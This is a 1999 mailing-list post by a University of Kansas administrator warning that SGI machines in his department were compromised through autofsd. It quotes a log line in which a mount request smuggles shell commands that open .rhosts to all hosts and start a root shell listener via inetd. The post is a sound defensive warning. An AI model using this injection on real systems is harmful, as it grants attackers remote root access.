Re: Computer Security (SGI)
David Vander Velde (dave@kunmr.chem.ukans.edu)
Fri, 15 Oct 1999 11:30:30 -0500 (CDT)
Have you seen this one in your system logs yet?
Oct 9 19:36:05 3D: autofsd[194]: mount of /hosts/;echo '+ +' > /.rhosts;
echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd
/tmp/bob failed
All of the SGIs in our department were visited; for at least some, it was
successful with a root compromise. I don't know if other UNIX systems
are vulnerable, as well. Dave Vander Velde, University of Kansas